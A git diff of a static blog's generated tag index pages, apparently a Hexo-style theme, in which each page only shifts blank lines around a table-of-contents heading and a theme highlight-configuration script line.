@@ -43,8 +43,6 @@
-
-
@@ -595,6 +593,8 @@
 目录
 var highlightShrink = ""; var HighlightHeightLimit = "";
+
+
diff --git "a/tags/\347\226\253\345\276\200\346\203\205\346\267\261/index.html" "b/tags/\347\226\253\345\276\200\346\203\205\346\267\261/index.html"
index 389cca063b..727a995da5 100644
--- "a/tags/\347\226\253\345\276\200\346\203\205\346\267\261/index.html"
+++ "b/tags/\347\226\253\345\276\200\346\203\205\346\267\261/index.html"
@@ -43,8 +43,6 @@
-
-
@@ -645,6 +643,8 @@
 目录
 var highlightShrink = ""; var HighlightHeightLimit = "";
+
+
diff --git "a/tags/\347\233\256\346\240\207\346\243\200\346\265\213/index.html" "b/tags/\347\233\256\346\240\207\346\243\200\346\265\213/index.html"
index f8a80a8a74..804517a5b7 100644
--- "a/tags/\347\233\256\346\240\207\346\243\200\346\265\213/index.html"
+++ "b/tags/\347\233\256\346\240\207\346\243\200\346\265\213/index.html"
@@ -43,8 +43,6 @@
-
-
@@ -555,6 +553,8 @@
 目录
 var highlightShrink = ""; var HighlightHeightLimit = "";
+
+
diff --git "a/tags/\347\240\224\344\270\200\344\270\213\346\227\245\345\270\270/index.html" "b/tags/\347\240\224\344\270\200\344\270\213\346\227\245\345\270\270/index.html"
index 367049626d..0723eecc8d 100644
--- "a/tags/\347\240\224\344\270\200\344\270\213\346\227\245\345\270\270/index.html"
+++ "b/tags/\347\240\224\344\270\200\344\270\213\346\227\245\345\270\270/index.html"
@@ -43,8 +43,6 @@
-
-
@@ -710,6 +708,8 @@
 目录
 var highlightShrink = ""; var HighlightHeightLimit = "";
+
+
diff --git "a/tags/\347\240\224\344\270\200\344\270\213\346\227\245\345\270\270/page/2/index.html" "b/tags/\347\240\224\344\270\200\344\270\213\346\227\245\345\270\270/page/2/index.html"
index 367049626d..0723eecc8d 100644
--- "a/tags/\347\240\224\344\270\200\344\270\213\346\227\245\345\270\270/page/2/index.html"
+++ "b/tags/\347\240\224\344\270\200\344\270\213\346\227\245\345\270\270/page/2/index.html"
@@ -43,8 +43,6 @@
-
-
@@ -710,6 +708,8 @@
 目录
 var highlightShrink = ""; var HighlightHeightLimit = "";
+
+
diff --git "a/tags/\347\240\224\344\270\200\344\270\213\346\227\245\345\270\270/page/3/index.html" "b/tags/\347\240\224\344\270\200\344\270\213\346\227\245\345\270\270/page/3/index.html"
index 367049626d..0723eecc8d 100644
--- "a/tags/\347\240\224\344\270\200\344\270\213\346\227\245\345\270\270/page/3/index.html"
+++ "b/tags/\347\240\224\344\270\200\344\270\213\346\227\245\345\270\270/page/3/index.html"
@@ -43,8 +43,6 @@
-
-
@@ -710,6 +708,8 @@
 目录
 var highlightShrink = ""; var HighlightHeightLimit = "";
+
+
diff --git "a/tags/\347\240\224\344\270\200\346\232\221\345\201\207/index.html" "b/tags/\347\240\224\344\270\200\346\232\221\345\201\207/index.html"
index 97e1a32c6e..b3d623a251 100644
--- "a/tags/\347\240\224\344\270\200\346\232\221\345\201\207/index.html"
+++ "b/tags/\347\240\224\344\270\200\346\232\221\345\201\207/index.html"
@@ -43,8 +43,6 @@
-
-
@@ -575,6 +573,8 @@
 目录
 var highlightShrink = ""; var HighlightHeightLimit = "";
+
+
diff --git "a/tags/\347\240\224\344\270\211\344\270\212\346\227\245\345\270\270/index.html" "b/tags/\347\240\224\344\270\211\344\270\212\346\227\245\345\270\270/index.html"
index d2eb73702e..78aa7fa2b4 100644
--- "a/tags/\347\240\224\344\270\211\344\270\212\346\227\245\345\270\270/index.html"
+++ "b/tags/\347\240\224\344\270\211\344\270\212\346\227\245\345\270\270/index.html"
@@ -43,8 +43,6 @@
-
-
@@ -575,6 +573,8 @@
 目录
 var highlightShrink = ""; var HighlightHeightLimit = "";
+
+
diff --git "a/tags/\347\240\224\344\272\214\344\270\212\346\227\245\345\270\270/index.html" "b/tags/\347\240\224\344\272\214\344\270\212\346\227\245\345\270\270/index.html"
index fa4bd6825a..9ae3a31825 100644
--- "a/tags/\347\240\224\344\272\214\344\270\212\346\227\245\345\270\270/index.html"
+++ "b/tags/\347\240\224\344\272\214\344\270\212\346\227\245\345\270\270/index.html"
@@ -43,8 +43,6 @@
-
-
@@ -680,6 +678,8 @@
 目录
 var highlightShrink = ""; var HighlightHeightLimit = "";
+
+
diff --git "a/tags/\347\240\224\344\272\214\344\270\212\346\227\245\345\270\270/page/2/index.html" "b/tags/\347\240\224\344\272\214\344\270\212\346\227\245\345\270\270/page/2/index.html"
index fa4bd6825a..9ae3a31825 100644
--- "a/tags/\347\240\224\344\272\214\344\270\212\346\227\245\345\270\270/page/2/index.html"
+++ "b/tags/\347\240\224\344\272\214\344\270\212\346\227\245\345\270\270/page/2/index.html"
@@ -43,8 +43,6 @@
-
-
@@ -680,6 +678,8 @@
 目录
 var highlightShrink = ""; var HighlightHeightLimit = "";
+
+
diff --git "a/tags/\347\240\224\344\272\214\344\270\213\346\227\245\345\270\270/index.html" "b/tags/\347\240\224\344\272\214\344\270\213\346\227\245\345\270\270/index.html"
index 50015e5e40..0430979594 100644
--- "a/tags/\347\240\224\344\272\214\344\270\213\346\227\245\345\270\270/index.html"
+++ "b/tags/\347\240\224\344\272\214\344\270\213\346\227\245\345\270\270/index.html"
@@ -43,8 +43,6 @@
-
-
@@ -690,6 +688,8 @@
 目录
 var highlightShrink = ""; var HighlightHeightLimit = "";
+
+
diff --git "a/tags/\347\240\224\344\272\214\344\270\213\346\227\245\345\270\270/page/2/index.html" "b/tags/\347\240\224\344\272\214\344\270\213\346\227\245\345\270\270/page/2/index.html"
index 50015e5e40..0430979594 100644
--- "a/tags/\347\240\224\344\272\214\344\270\213\346\227\245\345\270\270/page/2/index.html"
+++ "b/tags/\347\240\224\344\272\214\344\270\213\346\227\245\345\270\270/page/2/index.html"
@@ -43,8 +43,6 @@
-
-
@@ -690,6 +688,8 @@
 目录
 var highlightShrink = ""; var HighlightHeightLimit = "";
+
+
diff --git "a/tags/\347\240\224\344\272\214\344\270\213\346\227\245\345\270\270/page/3/index.html" "b/tags/\347\240\224\344\272\214\344\270\213\346\227\245\345\270\270/page/3/index.html"
index 50015e5e40..0430979594 100644
--- "a/tags/\347\240\224\344\272\214\344\270\213\346\227\245\345\270\270/page/3/index.html"
+++ "b/tags/\347\240\224\344\272\214\344\270\213\346\227\245\345\270\270/page/3/index.html"
@@ -43,8 +43,6 @@
-
-
@@ -690,6 +688,8 @@
 目录
 var highlightShrink = ""; var HighlightHeightLimit = "";
+
+
diff --git "a/tags/\347\240\224\351\233\266/index.html" "b/tags/\347\240\224\351\233\266/index.html"
index cee8d402e7..01545b46e7 100644
--- "a/tags/\347\240\224\351\233\266/index.html"
+++ "b/tags/\347\240\224\351\233\266/index.html"
@@ -43,8 +43,6 @@
-
-
@@ -620,6 +618,8 @@
 目录
 var highlightShrink = ""; var HighlightHeightLimit = "";
+
+
diff --git "a/tags/\347\242\216\347\242\216\345\277\265/index.html" "b/tags/\347\242\216\347\242\216\345\277\265/index.html"
index 92d95e38f8..01b9900d42 100644
--- "a/tags/\347\242\216\347\242\216\345\277\265/index.html"
+++ "b/tags/\347\242\216\347\242\216\345\277\265/index.html"
@@ -43,8 +43,6 @@
-
-
@@ -645,6 +643,8 @@
 目录
 var highlightShrink = ""; var HighlightHeightLimit = "";
+
+
diff --git "a/tags/\347\242\216\347\242\216\345\277\265/page/2/index.html" "b/tags/\347\242\216\347\242\216\345\277\265/page/2/index.html"
index 92d95e38f8..01b9900d42 100644
--- "a/tags/\347\242\216\347\242\216\345\277\265/page/2/index.html"
+++ "b/tags/\347\242\216\347\242\216\345\277\265/page/2/index.html"
@@ -43,8 +43,6 @@
-
-
@@ -645,6 +643,8 @@
 目录
 var highlightShrink = ""; var HighlightHeightLimit = "";
+
+
diff --git "a/tags/\347\262\244\344\272\206/index.html" "b/tags/\347\262\244\344\272\206/index.html"
index 398c589534..c888f4917a 100644
--- "a/tags/\347\262\244\344\272\206/index.html"
+++ "b/tags/\347\262\244\344\272\206/index.html"
@@ -43,8 +43,6 @@
-
-
@@ -575,6 +573,8 @@
 目录
 var highlightShrink = ""; var HighlightHeightLimit = "";
+
+
diff --git "a/tags/\347\273\204\344\274\232/index.html" "b/tags/\347\273\204\344\274\232/index.html"
index 969d90d26c..565d967500 100644
--- "a/tags/\347\273\204\344\274\232/index.html"
+++ "b/tags/\347\273\204\344\274\232/index.html"
@@ -43,8 +43,6 @@
-
-
@@ -555,6 +553,8 @@
 目录
 var highlightShrink = ""; var HighlightHeightLimit = "";
+
+
diff --git "a/tags/\350\213\261\350\257\255/index.html" "b/tags/\350\213\261\350\257\255/index.html"
index 90f08cde41..8e22a02be7 100644
--- "a/tags/\350\213\261\350\257\255/index.html"
+++ "b/tags/\350\213\261\350\257\255/index.html"
@@ -43,8 +43,6 @@
-
-
@@ -555,6 +553,8 @@
 目录
 var highlightShrink = ""; var HighlightHeightLimit = "";
+
+
diff --git "a/tags/\350\216\253\347\203\246/index.html" "b/tags/\350\216\253\347\203\246/index.html"
index de682352f9..f7b81c1b1f 100644
--- "a/tags/\350\216\253\347\203\246/index.html"
+++ "b/tags/\350\216\253\347\203\246/index.html"
@@ -43,8 +43,6 @@
-
-
@@ -605,6 +603,8 @@
 目录
 var highlightShrink = ""; var HighlightHeightLimit = "";
+
+
diff --git "a/tags/\350\256\241\345\210\222/index.html" "b/tags/\350\256\241\345\210\222/index.html"
index 95334cfecc..c48ceb696f 100644
--- "a/tags/\350\256\241\345\210\222/index.html"
+++ "b/tags/\350\256\241\345\210\222/index.html"
@@ -43,8 +43,6 @@
-
-
@@ -610,6 +608,8 @@
 目录
 var highlightShrink = ""; var HighlightHeightLimit = "";
+
+
diff --git "a/tags/\350\256\241\347\256\227\346\234\272\345\233\276\345\275\242\345\255\246/index.html" "b/tags/\350\256\241\347\256\227\346\234\272\345\233\276\345\275\242\345\255\246/index.html"
index d1d57d5fd7..e02cedd320 100644
--- "a/tags/\350\256\241\347\256\227\346\234\272\345\233\276\345\275\242\345\255\246/index.html"
+++ "b/tags/\350\256\241\347\256\227\346\234\272\345\233\276\345\275\242\345\255\246/index.html"
@@ -43,8 +43,6 @@
-
-
@@ -605,6 +603,8 @@
 目录
 var highlightShrink = ""; var HighlightHeightLimit = "";
+
+
diff --git "a/tags/\350\256\272\346\226\207/index.html" "b/tags/\350\256\272\346\226\207/index.html"
index e389e1d29a..0d4631a6d8 100644
--- "a/tags/\350\256\272\346\226\207/index.html"
+++ "b/tags/\350\256\272\346\226\207/index.html"
@@ -43,8 +43,6 @@
-
-
@@ -1110,6 +1108,8 @@
 目录
 var highlightShrink = ""; var HighlightHeightLimit = "";
+
+
diff --git "a/tags/\350\256\272\346\226\207/page/2/index.html" "b/tags/\350\256\272\346\226\207/page/2/index.html"
index e389e1d29a..0d4631a6d8 100644
--- "a/tags/\350\256\272\346\226\207/page/2/index.html"
+++ "b/tags/\350\256\272\346\226\207/page/2/index.html"
@@ -43,8 +43,6 @@
-
-
@@ -1110,6 +1108,8 @@
 目录
 var highlightShrink = ""; var HighlightHeightLimit = "";
+
+
diff --git "a/tags/\350\256\272\346\226\207/page/3/index.html" "b/tags/\350\256\272\346\226\207/page/3/index.html"
index e389e1d29a..0d4631a6d8 100644
--- "a/tags/\350\256\272\346\226\207/page/3/index.html"
+++ "b/tags/\350\256\272\346\226\207/page/3/index.html"
@@ -43,8 +43,6 @@
-
-
@@ -1110,6 +1108,8 @@
 目录
 var highlightShrink = ""; var HighlightHeightLimit = "";
+
+
diff --git "a/tags/\350\256\272\346\226\207/page/4/index.html" "b/tags/\350\256\272\346\226\207/page/4/index.html"
index e389e1d29a..0d4631a6d8 100644
--- "a/tags/\350\256\272\346\226\207/page/4/index.html"
+++ "b/tags/\350\256\272\346\226\207/page/4/index.html"
@@ -43,8 +43,6 @@
-
-
@@ -1110,6 +1108,8 @@
 目录
 var highlightShrink = ""; var HighlightHeightLimit = "";
+
+
diff --git "a/tags/\350\256\272\346\226\207/page/5/index.html" "b/tags/\350\256\272\346\226\207/page/5/index.html"
index e389e1d29a..0d4631a6d8 100644
--- "a/tags/\350\256\272\346\226\207/page/5/index.html"
+++ "b/tags/\350\256\272\346\226\207/page/5/index.html"
@@ -43,8 +43,6 @@
-
-
@@ -1110,6 +1108,8 @@
 目录
 var highlightShrink = ""; var HighlightHeightLimit = "";
+
+
diff --git "a/tags/\350\256\272\346\226\207/page/6/index.html" "b/tags/\350\256\272\346\226\207/page/6/index.html"
index e389e1d29a..0d4631a6d8 100644
--- "a/tags/\350\256\272\346\226\207/page/6/index.html"
+++ "b/tags/\350\256\272\346\226\207/page/6/index.html"
@@ -43,8 +43,6 @@
-
-
@@ -1110,6 +1108,8 @@
 目录
 var highlightShrink = ""; var HighlightHeightLimit = "";
+
+
diff --git "a/tags/\350\256\272\346\226\207/page/7/index.html" "b/tags/\350\256\272\346\226\207/page/7/index.html"
index e389e1d29a..0d4631a6d8 100644
--- "a/tags/\350\256\272\346\226\207/page/7/index.html"
+++ "b/tags/\350\256\272\346\226\207/page/7/index.html"
@@ -43,8 +43,6 @@
-
-
@@ -1110,6 +1108,8 @@
 目录
 var highlightShrink = ""; var HighlightHeightLimit = "";
+
+
diff --git "a/tags/\350\256\272\346\226\207/page/8/index.html" "b/tags/\350\256\272\346\226\207/page/8/index.html"
index e389e1d29a..0d4631a6d8 100644
--- "a/tags/\350\256\272\346\226\207/page/8/index.html"
+++ "b/tags/\350\256\272\346\226\207/page/8/index.html"
@@ -43,8 +43,6 @@
-
-
@@ -1110,6 +1108,8 @@
 目录
 var highlightShrink = ""; var HighlightHeightLimit = "";
+
+
diff --git "a/tags/\350\256\272\346\226\207/page/9/index.html" "b/tags/\350\256\272\346\226\207/page/9/index.html"
index e389e1d29a..0d4631a6d8 100644
--- "a/tags/\350\256\272\346\226\207/page/9/index.html"
+++ "b/tags/\350\256\272\346\226\207/page/9/index.html"
@@ -43,8 +43,6 @@
-
-
@@ -1110,6 +1108,8 @@
 目录
 var highlightShrink = ""; var HighlightHeightLimit = "";
+
+
diff --git "a/tags/\350\260\214\345\230\211\350\257\232/index.html" "b/tags/\350\260\214\345\230\211\350\257\232/index.html"
index a1b4b61f31..9affab4520 100644
--- "a/tags/\350\260\214\345\230\211\350\257\232/index.html"
+++ "b/tags/\350\260\214\345\230\211\350\257\232/index.html"
@@ -43,8 +43,6 @@
-
-
@@ -575,6 +573,8 @@
 目录
 var highlightShrink = ""; var HighlightHeightLimit = "";
+
+
diff --git "a/tags/\350\261\241\346\243\213/index.html" "b/tags/\350\261\241\346\243\213/index.html"
index 0947146047..a1cbdc881a 100644
--- "a/tags/\350\261\241\346\243\213/index.html"
+++ "b/tags/\350\261\241\346\243\213/index.html"
@@ -43,8 +43,6 @@
-
-
@@ -555,6 +553,8 @@
 目录
 var highlightShrink = ""; var HighlightHeightLimit = "";
+
+
diff --git "a/tags/\350\265\243\344\272\206/index.html" "b/tags/\350\265\243\344\272\206/index.html"
index 22a83770c6..9b57b1519e 100644
--- "a/tags/\350\265\243\344\272\206/index.html"
+++ "b/tags/\350\265\243\344\272\206/index.html"
@@ -43,8 +43,6 @@
-
-
@@ -565,6 +563,8 @@
 目录
 var highlightShrink = ""; var HighlightHeightLimit = "";
+
+
diff --git "a/tags/\351\204\202\344\272\206/index.html" "b/tags/\351\204\202\344\272\206/index.html"
index da435db845..e49be6bd8b 100644
--- "a/tags/\351\204\202\344\272\206/index.html"
+++ "b/tags/\351\204\202\344\272\206/index.html"
@@ -43,8 +43,6 @@
-
-
@@ -575,6 +573,8 @@
 目录
 var highlightShrink = ""; var HighlightHeightLimit = "";
+
+